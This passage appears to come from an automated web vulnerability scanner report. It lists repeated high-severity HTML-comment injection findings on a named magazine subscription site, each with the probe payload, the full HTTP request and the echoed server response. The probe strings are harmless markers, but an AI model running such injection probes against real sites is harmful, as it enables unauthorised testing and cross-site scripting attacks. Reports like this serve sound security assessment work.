       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "f6bac--><a b=c>5d7fa6913fa".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.34. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 98a7b--><a%20b%3dc>e817f1477cd was submitted in the REST URL parameter 5. This input was echoed as 98a7b--><a b=c>e817f1477cd in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/98a7b--><a%20b%3dc>e817f1477cd HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:41 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000ir9fxFpqoVwr9kJNJc3rKUj:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:21 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "98a7b--><a b=c>e817f1477cd".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.35. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 612e4--><a%20b%3dc>f2127e61cbe was submitted in the REST URL parameter 5. This input was echoed as 612e4--><a b=c>f2127e61cbe in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/612e4--><a%20b%3dc>f2127e61cbe HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:45 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000OqKWB-sdiPChufquVEMh4yT:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:25 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "612e4--><a b=c>f2127e61cbe".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.36. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Details

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 7f2df--><a%20b%3dc>6ff088f3d15 was submitted in the REST URL parameter 5. This input was echoed as 7f2df--><a b=c>6ff088f3d15 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/7f2df--><a%20b%3dc>6ff088f3d15 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:42 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Fo0eHqqs4Sg6z3MPvm8V-dQ:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:22 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "7f2df--><a b=c>6ff088f3d15".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.37. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ElegantBride

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload e55b9--><a%20b%3dc>6bef17208f7 was submitted in the REST URL parameter 5. This input was echoed as e55b9--><a b=c>6bef17208f7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/e55b9--><a%20b%3dc>6bef17208f7 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:00 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000LomihKZgw68WOC5OkKAIPsi:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:40 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "e55b9--><a b=c>6bef17208f7".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.38. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GQ

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 3d40d--><a%20b%3dc>2d4dddff1d5 was submitted in the REST URL parameter 5. This input was echoed as 3d40d--><a b=c>2d4dddff1d5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/3d40d--><a%20b%3dc>2d4dddff1d5 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:50:24 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000c56eKoDBu92hjSoELRGTWsr:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:59:15 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "3d40d--><a b=c>2d4dddff1d5".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.39. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Glamour

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload a27bf--><a%20b%3dc>0a8804d8ed3 was submitted in the REST URL parameter 5. This input was echoed as a27bf--><a b=c>0a8804d8ed3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/a27bf--><a%20b%3dc>0a8804d8ed3 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:33 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000_WxbAG7s3OJ2_6Fk6JXUju6:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:24 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "a27bf--><a b=c>0a8804d8ed3".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.40. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GolfDigest

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 66710--><a%20b%3dc>39b0edb0aca was submitted in the REST URL parameter 5. This input was echoed as 66710--><a b=c>39b0edb0aca in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/66710--><a%20b%3dc>39b0edb0aca HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:51:24 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00004VMIyTRzQ7IDMHnnSCDahJm:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:00:16 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "66710--><a b=c>39b0edb0aca".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.41. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GolfWorld

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 5ca12--><a%20b%3dc>f6176278517 was submitted in the REST URL parameter 5. This input was echoed as 5ca12--><a b=c>f6176278517 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/5ca12--><a%20b%3dc>f6176278517 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:50:52 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000yWZkyQ2Dmp_a-WXP0Trg51H:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:59:43 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "5ca12--><a b=c>f6176278517".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.42. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Lucky

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 5d4f6--><a%20b%3dc>8f3f7215263 was submitted in the REST URL parameter 5. This input was echoed as 5d4f6--><a b=c>8f3f7215263 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/5d4f6--><a%20b%3dc>8f3f7215263 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:52:18 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000OVEkfbp2STWkegj-zVaEMgL:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:01:09 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "5d4f6--><a b=c>8f3f7215263".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.43. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ModernBride

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 33edf--><a%20b%3dc>9be40c08234 was submitted in the REST URL parameter 5. This input was echoed as 33edf--><a b=c>9be40c08234 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/33edf--><a%20b%3dc>9be40c08234 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:51:28 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00002mq_okqRHeZ0pVVISJbxdFP:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:00:08 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "33edf--><a b=c>9be40c08234".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.44. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_NewYorker

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 38c81--><a%20b%3dc>91da38e0a93 was submitted in the REST URL parameter 5. This input was echoed as 38c81--><a b=c>91da38e0a93 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/38c81--><a%20b%3dc>91da38e0a93 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:52:33 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000I4weEx0LAIj5IojBYDzy4Ts:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:01:24 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "38c81--><a b=c>91da38e0a93".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.45. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Self

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 64966--><a%20b%3dc>cbecfd5019f was submitted in the REST URL parameter 5. This input was echoed as 64966--><a b=c>cbecfd5019f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/64966--><a%20b%3dc>cbecfd5019f HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:51:59 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00008zxEkjMG8qWSKz4ok6F1JV-:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:00:51 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "64966--><a b=c>cbecfd5019f".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.46. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_TeenVogue

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 149e3--><a%20b%3dc>58e96b74057 was submitted in the REST URL parameter 5. This input was echoed as 149e3--><a b=c>58e96b74057 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/149e3--><a%20b%3dc>58e96b74057 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:51:52 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000rKgo6vzs-36_W-1g5D9HOMp:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:00:49 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "149e3--><a b=c>58e96b74057".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.47. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_VanityFair

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload bf9ef--><a%20b%3dc>c4c591cd110 was submitted in the REST URL parameter 5. This input was echoed as bf9ef--><a b=c>c4c591cd110 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/bf9ef--><a%20b%3dc>c4c591cd110 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:53:04 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000tze0kXm3Fg-QcJYB1lWZ5Fy:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:01:44 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
